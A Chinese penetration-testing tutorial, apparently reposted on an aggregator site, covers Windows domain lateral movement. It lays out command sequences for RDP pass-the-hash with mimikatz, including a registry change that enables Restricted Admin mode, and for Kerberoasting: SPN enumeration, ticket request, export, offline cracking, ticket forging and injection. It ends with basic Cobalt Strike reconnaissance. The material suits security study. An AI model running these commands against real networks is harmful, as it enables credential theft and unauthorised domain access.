IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 数据结构与算法 -> 内网安全学习(五)----域横向: SPN&RDP&Cobalt Strike -> 正文阅读

[数据结构与算法]内网安全学习(五)----域横向: SPN&RDP&Cobalt Strike

域横向 CobaltStrike&SPN&RDP

在这里插入图片描述
1.域横向移动—RDP传递-Mimikatz

除了之前提到的IPC、WMI、SMB、NTLM等协议的连接外,获取到的明文密码或HASH密文也可以通过RDP协议(3389端口)进行连接操作。

1)RDP明文密码连接:

Windows: mstsc
mstsc.exe /console /v192.168.3.21 /admin

linux: rdesktop 192.168.3.21:3389

2)RDP密文hash连接:

windows Server需要开启 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默认开启,同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持;开启命令:

REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v 
DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

开启后运行:

mstsc.exe /restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 “/run:mstsc.exe /restrictedadmin”

2.域横向移动—SPN服务–探针,请求,破解,重写

首先通过这篇为文章了解何为SPN:https://www.cnblogs.com/backlion/p/8082623.html

我们主要用到的是SPN扫描服务,其有扫描不会触发防火墙检测、探针、命令简单等优点,流程见思维导图。
在这里插入图片描述
在这里插入图片描述

黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为Kerberoast攻击。如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是Kerberoasting攻击的关键。

#探针(系统自带setspn命令):
setspn -q */*
setspn -q */* | finder "MSSQL"

我电脑上无域环境,啥都扫不到:
在这里插入图片描述
有域时查看域的服务信息,探针:
在这里插入图片描述
筛选出mssql服务:
在这里插入图片描述
收集信息:
在这里插入图片描述

# 请求: powershell运行! 也可以mimikatz工具
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"  //记得替换为之前筛选的服务

mimikatz.exe "kerberos::ask /target:xxxx"

查看会话删除原来的会话:
在这里插入图片描述
两行命令/mimikatz 请求服务:
在这里插入图片描述
可以看到请求了该服务票据:
在这里插入图片描述

# 导出: mimikatz工具
mimikatz.exe "kerberos::list /export"

导出票据信息后拿去破解:

用到kerberoast.py工具:

#爆破:
python tgsrepcrack.py passwd.txt xxxx.kirbi
python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerry@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi

在这里插入图片描述
得到密码Admin12345 :
在这里插入图片描述
验证一下:
在这里插入图片描述

#重写:
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512

mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存

票据注入进去后就相当于能直接连接了,不会验证,伪造admin用户。但成功几率不大,属于后续渗透工具。

3.域横向移动—流程一把梭哈—CobaltStrike工具初体验

大概流程:

启动-配置-监听-执行-上线-提权-信息收集(网络,凭证,定位等)-渗透
1.关于启动及配置讲解
2.关于提权及插件加载
3.关于信息收集命令讲解
4.关于视图自动化功能讲解

net view
net computer
net dclist 
shell net user /domain

在这里插入图片描述

具体使用参考:《Cobalt Strike 4.0 手册》

  数据结构与算法 最新文章
【力扣106】 从中序与后续遍历序列构造二叉
leetcode 322 零钱兑换
哈希的应用:海量数据处理
动态规划|最短Hamilton路径
华为机试_HJ41 称砝码【中等】【menset】【
【C与数据结构】——寒假提高每日练习Day1
基础算法——堆排序
2023王道数据结构线性表--单链表课后习题部
LeetCode 之 反转链表的一部分
【题解】lintcode必刷50题<有效的括号序列
上一篇文章      下一篇文章      查看所有文章
加:2022-02-14 21:25:47  更:2022-02-14 21:28:09 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 17:52:19-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码